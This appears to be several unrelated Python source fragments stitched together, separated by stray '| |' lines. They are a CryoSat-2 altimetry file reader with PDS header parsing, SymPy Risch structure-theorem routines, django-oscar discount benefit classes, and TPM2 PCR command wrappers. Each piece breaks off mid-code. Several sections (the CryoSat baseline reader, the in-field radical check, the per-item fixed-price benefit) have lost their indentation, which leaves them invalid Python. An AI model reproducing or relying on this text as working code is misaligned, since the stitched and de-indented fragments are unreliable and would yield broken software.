    # SIR_FDM_1B: Level-1 Product Fast Delivery Marine Mode
    # SIR_SAR_1B: Level-1 SAR Mode
    # SIR_SIN_1B: Level-1 SARin Mode
    # SIR?LRC11B/SIR?SAC11B/SIR_SIC11B/SIR_SICC1B: Level-1 CAL1 products
    # SIR?SAC21B/SIR?SIC21B: Level-1 CAL2 products
    # SIR?LRM_0M/SIR?SAR_0M/SIR_SIN_0M: monitoring data
    # SIR_SIC40M: CAL4 Monitoring Data
    regex_products = ('SIR1SAR_FR|SIR2SAR_FR|SIR_SIN_FR|SIR_LRM_1B|SIR_FDM_1B|'
        'SIR_SAR_1B|SIR_SIN_1B|SIR1LRC11B|SIR2LRC11B|SIR1SAC11B|SIR2SAC11B|'
        'SIR_SIC11B|SIR_SICC1B|SIR1SAC21B|SIR2SAC21B|SIR1SIC21B|SIR2SIC21B|'
        'SIR1LRM_0M|SIR2LRM_0M|SIR1SAR_0M|SIR2SAR_0M|SIR_SIN_0M|SIR_SIC40M')
    # CRYOSAT LEVEL-1b PRODUCTS NAMING RULES:
    # Mission Identifier _ File Class _ File Product _
    # Validity Start _ Validity Stop _ Baseline Identifier Version
    regex_pattern = r'(.*?)_({0})_({1})_(\d+T?\d+)_(\d+T?\d+)_(.*?)(\d+)'
    rx = re.compile(regex_pattern.format(regex_class, regex_products), re.VERBOSE)
    # extract file information from filename
    MI, CLASS, PRODUCT, START, STOP, BASELINE, VERSION = rx.findall(fileBasename).pop()
    # IDIOM FIX: was "print(full_filename) if verbose else None"
    if verbose:
        print(full_filename)
    # get dataset MODE from PRODUCT portion of file name
    self.MODE = re.findall(r'(LRM|FDM|SAR|SIN)', PRODUCT).pop()
    # read level-1b CryoSat-2 data from netCDF4 file (Baseline D)
    CS_L1b_mds = self.cryosat_baseline_D(full_filename, unpack=unpack)
    # calculate GPS time of CryoSat data (seconds since Jan 6, 1980 00:00:00)
    # from TAI time since Jan 1, 2000 00:00:00
    GPS_Time = self.calc_GPS_time(CS_L1b_mds['Location']['Day'],
        CS_L1b_mds['Location']['Second'], CS_L1b_mds['Location']['Micsec'])
    # leap seconds for converting from GPS time to UTC time
    leap_seconds = self.count_leap_seconds(GPS_Time)
    # calculate dates as J2000 days (UTC)
    CS_L1b_mds['Location']['days_J2k'] = (GPS_Time - leap_seconds)/86400.0 - 7300.0
    # parameters to extract
    if field_dict is None:
        field_dict = self.__default_field_dict__()
    # extract fields of interest using field dict keys
    for group, variables in field_dict.items():
        for field in variables:
            if field not in self.fields:
                self.fields.append(field)
            setattr(self, field, CS_L1b_mds[group][field])
    # update size and shape of input data
    self.__update_size_and_shape__()
    # return the data and header text
    return self
def calc_GPS_time(self, day, second, micsec):
    """
    Calculate the GPS time (seconds since Jan 6, 1980 00:00:00)
    from TAI day/second/microsecond counts referenced to 2000-01-01.
    """
    # days are counted from 2000-01-01; adding 7300 rebases to 1980-01-06
    GPS_days = day + 7300.0
    # TAI time is ahead of GPS by 19 seconds
    return GPS_days*86400.0 + second.astype('f') + micsec/1e6 - 19
def count_leap_seconds(self, GPS_Time):
    """
    Count number of leap seconds that have passed for given GPS times

    FIX: the old implementation pre-scanned with count_nonzero and then
    unpacked np.nonzero into exactly two index arrays, so it only worked
    for 2D input and scanned each epoch twice.  A boolean-mask increment
    is identical for 2D arrays and works for any dimensionality.
    """
    # GPS seconds at which each leap second took effect
    # NOTE(review): table appears to end at the 2017 leap second --
    # extend if new leap seconds are announced.
    leaps = [46828800, 78364801, 109900802, 173059203, 252028804, 315187205,
        346723206, 393984007, 425520008, 457056009, 504489610, 551750411,
        599184012, 820108813, 914803214, 1025136015, 1119744016, 1167264017]
    # number of leap seconds prior to each GPS_Time value
    n_leaps = np.zeros_like(GPS_Time)
    for leap in leaps:
        n_leaps[GPS_Time >= leap] += 1.0
    return n_leaps
def read_MPH(self, full_filename):
    """
    Read ASCII Main Product Header (MPH) block from an ESA PDS file

    Returns a dict mapping header field names to their (quote-stripped)
    string values.

    Raises:
        IOError: first line is not a PRODUCT declaration
    """
    # read input data file
    with open(os.path.expanduser(full_filename), 'rb') as fid:
        file_contents = fid.read().splitlines()
    # standard MPH blocks are exactly 41 text lines long
    n_MPH_lines = 41
    # the first header line must declare the PRODUCT
    if not re.match(br'PRODUCT\=\"(.*)(?=\")', file_contents[0]):
        raise IOError('File does not start with a valid PDS MPH')
    # quoted form takes precedence over the bare KEY=VALUE form
    quoted = br'(.*?)\=\"(.*)(?=\")'
    unquoted = br'(.*?)\=(.*)'
    s_MPH_fields = {}
    for i in range(n_MPH_lines):
        line = file_contents[i]
        for pattern in (quoted, unquoted):
            if re.match(pattern, line):
                field, value = re.findall(pattern, line).pop()
                s_MPH_fields[field.decode('utf-8')] = value.decode('utf-8').rstrip()
                break
    # Return block name array to calling function
    return s_MPH_fields
def read_SPH(self, full_filename, j_sph_size):
    """
    Read ASCII Specific Product Header (SPH) block from a PDS file

    Returns a flat dict of SPH fields; each DS_NAME entry becomes a
    nested dict keyed by the data-set name, holding the 6 descriptor
    lines that follow it.

    NOTE(review): j_sph_size is accepted but never used here -- confirm
    whether callers rely on it.
    """
    # read input data file
    with open(os.path.expanduser(full_filename), 'rb') as fid:
        file_contents = fid.read().splitlines()
    # Define constant values associated with PDS file formats
    # number of text lines in standard MPH
    n_MPH_lines = 41
    # compile regular expression operator for reading headers
    rx = re.compile(br'(.*?)\=\"?(.*)',re.VERBOSE)
    # check first line of header matches SPH_DESCRIPTOR
    if not bool(re.match(br'SPH\_DESCRIPTOR\=',file_contents[n_MPH_lines+1])):
        raise IOError('File does not have a valid PDS DSD')
    # read SPH header text (no binary control characters)
    s_SPH_lines = [li for li in file_contents[n_MPH_lines+1:] if rx.match(li)
        and not re.search(br'[^\x20-\x7e]+',li)]
    # extract SPH header text
    s_SPH_fields = {}
    c = 0
    while (c < len(s_SPH_lines)):
        # check if line is within DS_NAME portion of SPH header
        if bool(re.match(br'DS_NAME',s_SPH_lines[c])):
            # add dictionary for DS_NAME
            field,value=re.findall(br'(.*?)\=\"(.*)(?=\")',s_SPH_lines[c]).pop()
            key = value.decode('utf-8').rstrip()
            s_SPH_fields[key] = {}
            # the 6 lines following DS_NAME describe that data set
            for line in s_SPH_lines[c+1:c+7]:
                if bool(re.match(br'(.*?)\=\"(.*)(?=\")',line)):
                    # data fields within quotes
                    dsfield,dsvalue=re.findall(br'(.*?)\=\"(.*)(?=\")',line).pop()
                    s_SPH_fields[key][dsfield.decode('utf-8')] = dsvalue.decode('utf-8').rstrip()
                elif bool(re.match(br'(.*?)\=(.*)',line)):
                    # data fields without quotes
                    dsfield,dsvalue=re.findall(br'(.*?)\=(.*)',line).pop()
                    s_SPH_fields[key][dsfield.decode('utf-8')] = dsvalue.decode('utf-8').rstrip()
            # add 6 to counter to go to next entry
            # (the unconditional c += 1 below completes the 7-line stride)
            c += 6
        # use regular expression operators to read headers
        elif bool(re.match(br'(.*?)\=\"(.*)(?=\")',s_SPH_lines[c])):
            # data fields within quotes
            field,value=re.findall(br'(.*?)\=\"(.*)(?=\")',s_SPH_lines[c]).pop()
            s_SPH_fields[field.decode('utf-8')] = value.decode('utf-8').rstrip()
        elif bool(re.match(br'(.*?)\=(.*)',s_SPH_lines[c])):
            # data fields without quotes
            field,value=re.findall(br'(.*?)\=(.*)',s_SPH_lines[c]).pop()
            s_SPH_fields[field.decode('utf-8')] = value.decode('utf-8').rstrip()
        # add 1 to counter to go to next line
        c += 1
    # Return block name array to calling function
    return s_SPH_fields
def read_DSD(self, full_filename, DS_TYPE=None):
    """
    Read ASCII Data Set Descriptors (DSD) block from a PDS file

    Locates the first DSD whose DS_NAME matches the given product type
    and returns its 8 descriptor fields as a dict.

    Arguments:
        full_filename: path to the PDS file
        DS_TYPE: 'CS_L1B' or 'SIR_L1B_FDM' (anything else finds no DSD)

    Raises:
        IOError: no matching DSD block found
    """
    # read input data file
    with open(os.path.expanduser(full_filename), 'rb') as fid:
        file_contents = fid.read().splitlines()
    # number of text lines in standard MPH
    n_MPH_lines = 41
    # number of text lines in a DSD header
    n_DSD_lines = 8
    # Level-1b CryoSat DS_NAMES within files
    regex_patterns = []
    if DS_TYPE == 'CS_L1B':
        regex_patterns.append(br'DS_NAME\="SIR_L1B_LRM[\s+]*"')
        regex_patterns.append(br'DS_NAME\="SIR_L1B_SAR[\s+]*"')
        regex_patterns.append(br'DS_NAME\="SIR_L1B_SARIN[\s+]*"')
    elif DS_TYPE == 'SIR_L1B_FDM':
        regex_patterns.append(br'DS_NAME\="SIR_L1B_FDM[\s+]*"')
    # find the DSD starting line within the SPH header
    # BUG FIX: indice was unbound (NameError) when regex_patterns was
    # empty, i.e. for an unknown DS_TYPE; now the intended IOError fires.
    indice = []
    c = 0
    Flag = False
    while not Flag and c < len(regex_patterns):
        # line offsets (relative to the SPH start) matching this pattern
        indice = [i for i, line in enumerate(file_contents[n_MPH_lines+1:])
            if re.search(regex_patterns[c], line)]
        if indice:
            Flag = True
        else:
            c += 1
    # check that a valid indice was found within the header
    if not indice:
        raise IOError('Can not find correct DSD field')
    # extract s_DSD_fields info
    DSD_START = n_MPH_lines + indice[0] + 1
    s_DSD_fields = {}
    for i in range(DSD_START, DSD_START + n_DSD_lines):
        line = file_contents[i]
        # use regular expression operators to read headers
        if re.match(br'(.*?)\=\"(.*)(?=\")', line):
            # data fields within quotes
            field, value = re.findall(br'(.*?)\=\"(.*)(?=\")', line).pop()
            s_DSD_fields[field.decode('utf-8')] = value.decode('utf-8').rstrip()
        elif re.match(br'(.*?)\=(.*)', line):
            # data fields without quotes
            field, value = re.findall(br'(.*?)\=(.*)', line).pop()
            s_DSD_fields[field.decode('utf-8')] = value.decode('utf-8').rstrip()
    # Return block name array to calling function
    return s_DSD_fields
def cryosat_baseline_AB(self, fid, n_records):
"""
Read L1b MDS variables for CryoSat Baselines A and B
"""
n_SARIN_RW = 512
n_SAR_RW = 128
n_LRM_RW = 128
n_blocks = 20
n_BeamBehaviourParams = 50
| |
result, const)
def is_log_deriv_k_t_radical(fa, fd, DE, Df=True):
    r"""
    Checks if Df is the logarithmic derivative of a k(t)-radical.

    b in k(t) can be written as the logarithmic derivative of a k(t) radical if
    there exist n in ZZ and u in k(t) with n, u != 0 such that n*b == Du/u.
    Either returns (ans, u, n, const) or None, which means that Df cannot be
    written as the logarithmic derivative of a k(t)-radical. ans is a list of
    tuples such that Mul(*[i**j for i, j in ans]) == u. This is useful for
    seeing exactly what elements of k(t) produce u.

    This function uses the structure theorem approach, which says that for any
    f in K, Df is the logarithmic derivative of a K-radical if and only if there
    are ri in QQ such that::

            ---               ---       Dt
            \    r  * Dt   +  \    r  *   i
            /     i     i     /     i   ---   =  Df.
            ---               ---        t
         i in L            i in E         i
               K/C(x)            K/C(x)

    Where C = Const(K), L_K/C(x) = { i in {1, ..., n} such that t_i is
    transcendental over C(x)(t_1, ..., t_i-1) and Dt_i = Da_i/a_i, for some a_i
    in C(x)(t_1, ..., t_i-1)* } (i.e., the set of all indices of logarithmic
    monomials of K over C(x)), and E_K/C(x) = { i in {1, ..., n} such that t_i
    is transcendental over C(x)(t_1, ..., t_i-1) and Dt_i/t_i = Da_i, for some
    a_i in C(x)(t_1, ..., t_i-1) } (i.e., the set of all indices of
    hyperexponential monomials of K over C(x)). If K is an elementary extension
    over C(x), then the cardinality of L_K/C(x) U E_K/C(x) is exactly the
    transcendence degree of K over C(x). Furthermore, because Const_D(K) ==
    Const_D(C(x)) == C, deg(Dt_i) == 1 when t_i is in E_K/C(x) and
    deg(Dt_i) == 0 when t_i is in L_K/C(x), implying in particular that E_K/C(x)
    and L_K/C(x) are disjoint.

    The sets L_K/C(x) and E_K/C(x) must, by their nature, be computed
    recursively using this same function. Therefore, it is required to pass
    them as indices to D (or T). L_args are the arguments of the logarithms
    indexed by L_K (i.e., if i is in L_K, then T[i] == log(L_args[i])). This is
    needed to compute the final answer u such that n*f == Du/u.

    exp(f) will be the same as u up to a multiplicative constant. This is
    because they will both behave the same as monomials. For example, both
    exp(x) and exp(x + 1) == E*exp(x) satisfy Dt == t. Therefore, the term const
    is returned. const is such that exp(const)*f == u. This is calculated by
    subtracting the arguments of one exponential from the other. Therefore, it
    is necessary to pass the arguments of the exponential terms in E_args.

    To handle the case where we are given Df, not f, use
    is_log_deriv_k_t_radical_in_field().

    See also
    ========
    is_log_deriv_k_t_radical_in_field, is_deriv_k
    """
    # NOTE(review): H is never used below -- appears to be a leftover.
    H = []
    if Df:
        # Compute Df = (fd*Dfa - fa*Dfd)/fd**2 by the quotient rule.
        dfa, dfd = (fd*derivation(fa, DE) - fa*derivation(fd, DE)).cancel(fd**2,
            include=True)
    else:
        dfa, dfd = fa, fd
    # Our assumption here is that each monomial is recursively transcendental
    if len(DE.exts) != len(DE.D):
        if [i for i in DE.cases if i == 'tan'] or \
                (set([i for i in DE.cases if i == 'primitive']) -
                    set(DE.indices('log'))):
            raise NotImplementedError("Real version of the structure "
                "theorems with hypertangent support is not yet implemented.")
        # TODO: What should really be done in this case?
        raise NotImplementedError("Nonelementary extensions not supported "
            "in the structure theorems.")
    # Dt_i/t_i for hyperexponential monomials, Dt_i for logarithmic ones.
    E_part = [DE.D[i].quo(Poly(DE.T[i], DE.T[i])).as_expr() for i in DE.indices('exp')]
    L_part = [DE.D[i].as_expr() for i in DE.indices('log')]
    lhs = Matrix([E_part + L_part])
    rhs = Matrix([dfa.as_expr()/dfd.as_expr()])
    # Solve the linear system for constant (in Const(K)) coefficients.
    A, u = constant_system(lhs, rhs, DE)
    if not all(derivation(i, DE, basic=True).is_zero for i in u) or not A:
        # If the elements of u are not all constant
        # Note: See comment in constant_system
        # Also note: derivation(basic=True) calls cancel()
        return None
    else:
        if not all(i.is_Rational for i in u):
            # TODO: But maybe we can tell if they're not rational, like
            # log(2)/log(3). Also, there should be an option to continue
            # anyway, even if the result might potentially be wrong.
            raise NotImplementedError("Cannot work with non-rational "
                "coefficients in this case.")
        else:
            # Clear denominators: n is the lcm of the coefficient denominators.
            n = reduce(ilcm, [i.as_numer_denom()[1] for i in u])
            u *= n
            terms = ([DE.T[i] for i in DE.indices('exp')] +
                    [DE.extargs[i] for i in DE.indices('log')])
            ans = list(zip(terms, u))
            result = Mul(*[Pow(i, j) for i, j in ans])
            # exp(f) will be the same as result up to a multiplicative
            # constant. We now find the log of that constant.
            argterms = ([DE.extargs[i] for i in DE.indices('exp')] +
                    [DE.T[i] for i in DE.indices('log')])
            const = cancel(fa.as_expr()/fd.as_expr() -
                Add(*[Mul(i, j/n) for i, j in zip(argterms, u)]))
            return (ans, result, n, const)
def is_log_deriv_k_t_radical_in_field(fa, fd, DE, case='auto', z=None):
"""
Checks if f can be written as the logarithmic derivative of a k(t)-radical.
It differs from is_log_deriv_k_t_radical(fa, fd, DE, Df=False)
for any given fa, fd, DE in that it finds the solution in the
given field not in some (possibly unspecified extension) and
"in_field" with the function name is used to indicate that.
f in k(t) can be written as the logarithmic derivative of a k(t) radical if
there exist n in ZZ and u in k(t) with n, u != 0 such that n*f == Du/u.
Either returns (n, u) or None, which means that f cannot be written as the
logarithmic derivative of a k(t)-radical.
case is one of {'primitive', 'exp', 'tan', 'auto'} for the primitive,
hyperexponential, and hypertangent cases, respectively. If case is 'auto',
it will attempt to determine the type of the derivation automatically.
See also
========
is_log_deriv_k_t_radical, is_deriv_k
"""
fa, fd = fa.cancel(fd, include=True)
# f must be simple
n, s = splitfactor(fd, DE)
if not s.is_one:
pass
z = z or Dummy('z')
H, b = residue_reduce(fa, fd, DE, z=z)
if not b:
# I will have to verify, but I believe that the answer should be
# None in this case. This should never happen for the
# functions given when solving the parametric logarithmic
# derivative problem when integration elementary functions (see
# Bronstein's book, page 255), so most likely this indicates a bug.
return None
roots = [(i, i.real_roots()) for i, _ in H]
if not all(len(j) == i.degree() and all(k.is_Rational for k in j) for
i, j in roots):
# If f is the logarithmic derivative of a k(t)-radical, then all the
# roots of the resultant must be rational numbers.
return None
# [(a, i), ...], where i*log(a) is a term in the log-part of the integral
# of f
respolys, residues = list(zip(*roots)) or [[], []]
# Note: this might be empty, but everything below should work find in that
# case (it should be the same as if it were [[1, 1]])
residueterms = [(H[j][1].subs(z, i), i) for j in range(len(H)) for
i in residues[j]]
# TODO: finish writing this and write tests
p = cancel(fa.as_expr()/fd.as_expr() - residue_reduce_derivation(H, DE, z))
p = p.as_poly(DE.t)
if p is None:
# f - Dg will be in k[t] if f is the logarithmic derivative of a k(t)-radical
return None
if p.degree(DE.t) >= max(1, DE.d.degree(DE.t)):
return None
if case == 'auto':
case = DE.case
if case == 'exp':
wa, wd = derivation(DE.t, DE).cancel(Poly(DE.t, DE.t), include=True)
with DecrementLevel(DE):
pa, pd = frac_in(p, DE.t, cancel=True)
wa, wd = frac_in((wa, wd), DE.t)
A = parametric_log_deriv(pa, pd, wa, wd, DE)
if A is None:
return None
n, e, u = A
u *= DE.t**e
elif case == 'primitive':
with DecrementLevel(DE):
pa, pd = frac_in(p, DE.t)
A = is_log_deriv_k_t_radical_in_field(pa, pd, DE, case='auto')
if A is None:
return None
n, u = A
elif case == 'base':
# TODO: we can use more efficient residue reduction from ratint()
if not fd.is_sqf or fa.degree() >= fd.degree():
# f is the logarithmic derivative in | |
<filename>server/src/oscarbluelight/offer/benefits.py<gh_stars>1-10
from decimal import Decimal as D
from django.core import exceptions
from django.db import models
from django.utils.translation import gettext_lazy as _
from oscar.core.loading import get_model, get_class
from oscar.apps.offer import utils
from oscar.apps.offer.benefits import (
PercentageDiscountBenefit,
AbsoluteDiscountBenefit,
FixedPriceBenefit,
MultibuyDiscountBenefit,
ShippingBenefit,
ShippingAbsoluteDiscountBenefit,
ShippingFixedPriceBenefit,
ShippingPercentageDiscountBenefit,
)
from oscar.templatetags.currency_filters import currency
import copy
Benefit = get_model("offer", "Benefit")
BasketDiscount = get_class("offer.results", "BasketDiscount")
PostOrderAction = get_class("offer.results", "PostOrderAction")
ZERO_DISCOUNT = get_class("offer.results", "ZERO_DISCOUNT")
class BluelightPercentageDiscountBenefit(PercentageDiscountBenefit):
    """
    An offer benefit that gives a percentage discount
    """

    # Template for name/description; value and range filled in per property.
    _description = _("%(value)s%% discount on %(range)s, %(max_affected_items)s")

    class Meta:
        app_label = "offer"
        proxy = True
        verbose_name = _("Percentage discount benefit")
        verbose_name_plural = _("Percentage discount benefits")

    @property
    def name(self):
        # Plain-text variant: range rendered by name without markup.
        return self._append_max_discount_to_text(
            self._description
            % {
                "value": self.value,
                "range": self.range.name if self.range else _("product range"),
                "max_affected_items": (
                    _("maximum %s item(s)") % self.max_affected_items
                )
                if self.max_affected_items
                else _("no maximum"),
            }
        )

    @property
    def description(self):
        # HTML variant: range rendered as an anchor link.
        return self._append_max_discount_to_text(
            self._description
            % {
                "value": self.value,
                "range": utils.range_anchor(self.range)
                if self.range
                else _("product range"),
                "max_affected_items": (
                    _("maximum %s item(s)") % self.max_affected_items
                )
                if self.max_affected_items
                else _("no maximum"),
            }
        )

    def _clean(self):
        # Validate benefit configuration before it is applied.
        if not self.range:
            raise exceptions.ValidationError(
                _("Percentage benefits require a product range")
            )
        if not self.value or self.value <= 0 or self.value > 100:
            raise exceptions.ValidationError(
                _("Percentage discount requires a value between 0 and 100")
            )

    def apply(
        self,
        basket,
        condition,
        offer,
        discount_percent=None,
        max_total_discount=None,
        consume_items=None,
    ):
        """Apply the percentage discount to applicable basket lines.

        Returns a BasketDiscount for the total discount granted.
        max_total_discount caps the aggregate discount; consume_items,
        if given, replaces condition.consume_items for marking lines
        as consumed.
        """
        self._clean()
        if discount_percent is None:
            discount_percent = self.value
        # Remaining discount budget (None means no cap).
        discount_amount_available = self._get_max_discount_amount(max_total_discount)
        line_tuples = self.get_applicable_lines(offer, basket)
        discount_percent = min(discount_percent, D("100.0"))
        discount = D("0.00")
        affected_items = 0
        max_affected_items = self._effective_max_affected_items()
        affected_lines = []
        for price, line in line_tuples:
            if affected_items >= max_affected_items:
                break
            # Stop once the discount budget is exhausted (None never == 0).
            if discount_amount_available == 0:
                break
            quantity_affected = min(
                line.quantity_without_discount, max_affected_items - affected_items
            )
            if quantity_affected <= 0:
                continue
            line_discount = self.round(
                discount_percent / D("100.0") * price * int(quantity_affected),
                currency=basket.currency,
            )
            if discount_amount_available is not None:
                # Clamp to the remaining budget and draw it down.
                line_discount = min(line_discount, discount_amount_available)
                discount_amount_available -= line_discount
            if line_discount > 0:
                line.discount(
                    line_discount, quantity_affected, incl_tax=False, offer=offer
                )
                affected_lines.append((line, line_discount, quantity_affected))
                affected_items += quantity_affected
                discount += line_discount
        if discount > 0:
            # Mark the discounted lines as consumed by this offer.
            if consume_items:
                consume_items(offer, basket, affected_lines)
            else:
                condition.consume_items(offer, basket, affected_lines)
        return BasketDiscount(discount)
class BluelightAbsoluteDiscountBenefit(AbsoluteDiscountBenefit):
    """
    An offer benefit that gives an absolute discount
    """

    _description = _("%(value)s discount on %(range)s, %(max_affected_items)s")

    class Meta:
        app_label = "offer"
        proxy = True
        verbose_name = _("Absolute discount benefit")
        verbose_name_plural = _("Absolute discount benefits")

    @property
    def name(self):
        """Plain-text name of the benefit (range shown by its lower-cased name)."""
        return self._append_max_discount_to_text(
            self._description
            % {
                "value": currency(self.value),
                "range": self.range.name.lower() if self.range else _("product range"),
                "max_affected_items": (
                    _("maximum %s item(s)") % self.max_affected_items
                )
                if self.max_affected_items
                else _("no maximum"),
            }
        )

    @property
    def description(self):
        """Rich-text description of the benefit (range rendered as an anchor)."""
        return self._append_max_discount_to_text(
            self._description
            % {
                "value": currency(self.value),
                "range": utils.range_anchor(self.range)
                if self.range
                else _("product range"),
                "max_affected_items": (
                    _("maximum %s item(s)") % self.max_affected_items
                )
                if self.max_affected_items
                else _("no maximum"),
            }
        )

    def _clean(self):
        """Validate configuration: a range and a value are required.

        Raises:
            ValidationError: if the range or value is missing.
        """
        if not self.range:
            raise exceptions.ValidationError(
                _("Fixed discount benefits require a product range")
            )
        if not self.value:
            raise exceptions.ValidationError(
                _("Fixed discount benefits require a value")
            )

    def apply(
        self,
        basket,
        condition,
        offer,
        discount_amount=None,
        max_total_discount=None,
        consume_items=None,
    ):
        """Apply an absolute discount, spread pro-rata over the covered lines.

        Args:
            basket: Basket being priced.
            condition: Offer condition; its ``consume_items`` marks discounted
                items as consumed unless ``consume_items`` is supplied.
            offer: The offer this benefit belongs to.
            discount_amount: Amount to discount; defaults to ``self.value``.
            max_total_discount: Optional cap on the total discount amount.
            consume_items: Optional callable overriding
                ``condition.consume_items``.

        Returns:
            BasketDiscount: total discount applied (ZERO_DISCOUNT if none).
        """
        self._clean()
        if discount_amount is None:
            discount_amount = self.value

        # Fetch basket lines that are in the range and available to be used in
        # an offer.
        line_tuples = self.get_applicable_lines(offer, basket)

        # Determine which lines can have the discount applied to them
        max_affected_items = self._effective_max_affected_items()
        num_affected_items = 0
        affected_items_total = D("0.00")
        lines_to_discount = []
        for price, line in line_tuples:
            if num_affected_items >= max_affected_items:
                break
            qty = min(
                line.quantity_without_discount, max_affected_items - num_affected_items
            )
            # Skip lines with nothing left to discount. Including a qty == 0
            # line could cause the last-line rounding delta below to be
            # applied to a line that cannot absorb any discount (matches the
            # guard used by the percentage benefit).
            if qty <= 0:
                continue
            lines_to_discount.append((line, price, qty))
            num_affected_items += qty
            affected_items_total += qty * price

        # Ensure we don't try to apply a discount larger than the total of the
        # matching items.
        discount = min(discount_amount, affected_items_total)
        discount_amount_available = self._get_max_discount_amount(max_total_discount)
        if discount_amount_available is not None:
            discount = min(discount, discount_amount_available)
        if discount == 0:
            return ZERO_DISCOUNT

        # Apply discount equally amongst them
        affected_lines = []
        applied_discount = D("0.00")
        for i, (line, price, qty) in enumerate(lines_to_discount):
            if i == len(lines_to_discount) - 1:
                # If last line, then take the delta as the discount to ensure
                # the total discount is correct and doesn't mismatch due to
                # rounding.
                line_discount = discount - applied_discount
            else:
                # Calculate a weighted discount for the line
                line_discount = self.round(
                    ((price * qty) / affected_items_total) * discount,
                    currency=basket.currency,
                )
            if line_discount > 0:
                line.discount(line_discount, qty, incl_tax=False, offer=offer)
                affected_lines.append((line, line_discount, qty))
            applied_discount += line_discount

        # Mark the discounted items as consumed so other offers cannot re-use
        # them.
        if consume_items:
            consume_items(offer, basket, affected_lines)
        else:
            condition.consume_items(offer, basket, affected_lines)
        return BasketDiscount(discount)
class BluelightFixedPriceBenefit(FixedPriceBenefit):
    """
    An offer benefit that gives the items in the range for a fixed price.

    Oscar's default FixedPriceBenefit is unintuitive. It ignores the benefit range and
    the max_affected_items and uses the products affected by the condition instead. This
    changes the behavior to more closely follow how other benefits work. It applied, it
    gives the basket items in the benefit range for a fixed price, not the basket items
    in the condition range. It also respects the max_affected_items setting.
    """

    _description = _(
        "The products in the range are sold for %(amount)s, %(max_affected_items)s"
    )

    class Meta:
        app_label = "offer"
        proxy = True
        verbose_name = _("Fixed price benefit")
        verbose_name_plural = _("Fixed price benefits")

    @property
    def name(self):
        """Plain-text name of the benefit, including the max-item limit."""
        return self._append_max_discount_to_text(
            self._description
            % {
                "amount": currency(self.value),
                "max_affected_items": (
                    _("maximum %s item(s)") % self.max_affected_items
                )
                if self.max_affected_items
                else _("no maximum"),
            }
        )

    def _clean(self):
        """Validate configuration: a product range is required.

        Raises:
            ValidationError: if no product range is set.
        """
        if not self.range:
            raise exceptions.ValidationError(
                _("Fixed price benefits require a product range.")
            )

    def apply(
        self, basket, condition, offer, max_total_discount=None, consume_items=None
    ):
        """Sell the covered items for a fixed total price (``self.value``).

        Discounts the most expensive applicable lines (up to the effective
        max_affected_items) so their combined price equals ``self.value``,
        optionally capped by ``max_total_discount``.

        Returns:
            BasketDiscount: total discount applied (ZERO_DISCOUNT if none).
        """
        self._clean()

        # Fetch basket lines that are in the range and available to be used in an offer.
        line_tuples = self.get_applicable_lines(offer, basket)
        if not line_tuples:
            return ZERO_DISCOUNT

        # Sort from most-expensive to least-expensive
        line_tuples = line_tuples[::-1]

        # Determine the lines to consume
        num_permitted = self._effective_max_affected_items()
        num_affected = 0
        value_affected = D("0.00")
        covered_lines = []
        for price, line in line_tuples:
            quantity_affected = min(
                line.quantity_without_discount, (num_permitted - num_affected)
            )
            # Skip lines with nothing left to discount so that the last-line
            # rounding delta below is never applied to an empty line (matches
            # the guard used by the per-item variant).
            if quantity_affected <= 0:
                continue
            num_affected += quantity_affected
            value_affected += quantity_affected * price
            covered_lines.append((price, line, quantity_affected))
            if num_affected >= num_permitted:
                break

        discount = max(value_affected - self.value, D("0.00"))
        # Cap by the remaining discount budget. None means "no cap"; calling
        # min(discount, None) would raise a TypeError, so guard explicitly
        # (same pattern as the other benefit apply() methods).
        discount_amount_available = self._get_max_discount_amount(max_total_discount)
        if discount_amount_available is not None:
            discount = min(discount, discount_amount_available)
        if not discount:
            return ZERO_DISCOUNT
        if not covered_lines:
            return ZERO_DISCOUNT

        # Apply discount to the affected lines
        discount_applied = D("0.00")
        last_line = covered_lines[-1][1]
        for price, line, quantity in covered_lines:
            if line == last_line:
                # If last line, we just take the difference to ensure that
                # rounding doesn't lead to an off-by-one error
                line_discount = discount - discount_applied
            else:
                line_discount = self.round(
                    discount * (price * quantity) / value_affected,
                    currency=basket.currency,
                )
            if line_discount > 0:
                line.discount(line_discount, quantity, incl_tax=False, offer=offer)
            discount_applied += line_discount
        return BasketDiscount(discount)
class BluelightFixedPricePerItemBenefit(FixedPriceBenefit):
"""
An offer benefit that gives the items in the range for a fixed price.
Oscar's default FixedPriceBenefit is unintuitive. It ignores the benefit range and
the max_affected_items and uses the products affected by the condition instead. This
changes the behavior to more closely follow how other benefits work. It applied, it
gives the basket items in the benefit range for a fixed price, not the basket items
in the condition range. It also respects the max_affected_items setting.
"""
_description = _(
"The products in the range are sold for %(amount)s each; %(max_affected_items)s"
)
class Meta:
app_label = "offer"
proxy = True
verbose_name = _("Fixed price per item benefit")
verbose_name_plural = _("Fixed price per item benefits")
@property
def name(self):
return self._append_max_discount_to_text(
self._description
% {
"amount": currency(self.value),
"max_affected_items": (
_("maximum %s item(s)") % self.max_affected_items
)
if self.max_affected_items
else _("no maximum"),
}
)
def _clean(self):
if not self.range:
raise exceptions.ValidationError(
_("Fixed price per item benefits require a product range.")
)
def apply(
self, basket, condition, offer, max_total_discount=None, consume_items=None
):
self._clean()
# Fetch basket lines that are in the range and available to be used in an offer.
line_tuples = self.get_applicable_lines(offer, basket)
if not line_tuples:
return ZERO_DISCOUNT
# Sort from most-expensive to least-expensive
line_tuples = line_tuples[::-1]
# Determine the lines to consume
num_permitted = self._effective_max_affected_items()
num_affected = 0
covered_lines = []
for price, line in line_tuples:
if price <= self.value:
continue
quantity_affected = min(
line.quantity_without_discount, (num_permitted - num_affected)
)
if quantity_affected <= 0:
continue
num_affected += quantity_affected
covered_lines.append((price, line, quantity_affected))
if num_affected >= num_permitted:
break
if len(covered_lines) <= 0:
return ZERO_DISCOUNT
# Apply discount to the affected lines
discount_amount_available = | |
This command is used to cause an update to the indicated PCR.
Args:
pcrHandle (TPM_HANDLE): Handle of the PCR
Auth Handle: 1
Auth Role: USER
eventData (int): Event data in sized buffer
Returns:
digests - Table 80 shows the basic hash-agile structure used in this
specification. To handle hash agility, this structure uses
the hashAlg parameter to indicate the algorithm used to
compute the digest and, by implication, the size of the digest.
"""
req = TPM2_PCR_Event_REQUEST(pcrHandle, eventData)
respBuf = self.dispatchCommand(TPM_CC.PCR_Event, req)
res = self.processResponse(respBuf, PCR_EventResponse)
return res.digests if res else None
# PCR_Event()
def PCR_Read(self, pcrSelectionIn):
""" This command returns the values of all PCR specified in pcrSelectionIn.
Args:
pcrSelectionIn (TPMS_PCR_SELECTION): The selection of PCR to read
Returns:
pcrUpdateCounter - The current value of the PCR update counter
